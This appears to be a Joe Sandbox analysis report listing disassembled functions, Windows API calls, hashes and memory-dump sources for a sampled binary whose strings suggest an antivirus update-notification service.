                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction ID: d65800f045280e5b4ebf14eceb4e35b94a5e3c126be3b6125bc8919a039480ac
                                  • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction Fuzzy Hash: C9119031B19B418AE7508B52E86476972A0FB88FF4F004634EA5E87B96CF3CD564974C
                                  APIs
                                  • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                  • CreateEventW.KERNEL32 ref: 00000001400012C0
                                    • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                    • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                    • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                    • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                    • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                    • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                    • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                    • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                    • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                    • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                    • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                  • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                  • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                    • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                    • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                    • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                    • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                    • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                    • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                  • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                  • String ID: vseamps
                                  • API String ID: 3197017603-3944098904
                                  • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                  • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Messagesprintf_s
                                  • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                  • API String ID: 2642950106-3610746849
                                  • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                  • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                  • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                  • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 319667368-0
                                  • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                  • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                  • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                    • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 1390108997-0
                                  • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                  • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 3523768491-393685449
                                  • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction ID: 5e0dcbf1d4a9c3ddce8f8a749f3e7958689bd9901b84bc233a6110a92bddfdb0
                                  • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction Fuzzy Hash: 99E1C432B0A7828AEB109F65D4603AD37B0FB457A8F144235DA8D47797CF38E5A1D748
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00007FFDAC098BC9,?,?,?,?,00007FFDAC098C14), ref: 00007FFDAC0995CB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC098BC9,?,?,?,?,00007FFDAC098C14), ref: 00007FFDAC099601
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC098BC9,?,?,?,?,00007FFDAC098C14), ref: 00007FFDAC09962E
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC098BC9,?,?,?,?,00007FFDAC098C14), ref: 00007FFDAC09963F
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFDAC098BC9,?,?,?,?,00007FFDAC098C14), ref: 00007FFDAC099650
                                  • SetLastError.KERNEL32(?,?,?,00007FFDAC098BC9,?,?,?,?,00007FFDAC098C14), ref: 00007FFDAC09966B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction ID: 7dfb74992428984173b9de9e342e4c80d528b807d707ac2825f16fb966cc02c5
                                  • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction Fuzzy Hash: 4A116D20B0F24246FA646322557137A61969F84BF0F444B35E93E06BD7DF2CE461A70C
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                  • String ID:
                                  • API String ID: 3326452711-0
                                  • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                  • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                  • API String ID: 2984211723-1229430080
                                  • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                  • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction ID: dface65b150fe38abfee288258ab239071ee94143a2d901345ba36ea64a6ce8d
                                  • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction Fuzzy Hash: A8F0C222B1AA0281EB108B38E46437A6320AF847F0F440735CA6E467E6CF2CD059E70C
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                  • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                  • ExitProcess.KERNEL32 ref: 0000000140008545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AddressExitHandleModuleProcProcess
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 75539706-1276376045
                                  • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                  • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction ID: 050a7a08e7f8c7d7d69d240e8cf465e4deaf62a49c2f3d3e3e2bacc761c7649c
                                  • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction Fuzzy Hash: 4CB1AD22B0F68281EA65CA95916033963A0FF54BE4F498835DF4D07787DF3CE462A38D
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: FileInfoSleepStartupType
                                  • String ID:
                                  • API String ID: 1527402494-0
                                  • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                  • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CommandLine$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 3078728599-0
                                  • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                  • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 1850339568-0
                                  • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                  • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: _set_statfp
                                  • String ID:
                                  • API String ID: 1156100317-0
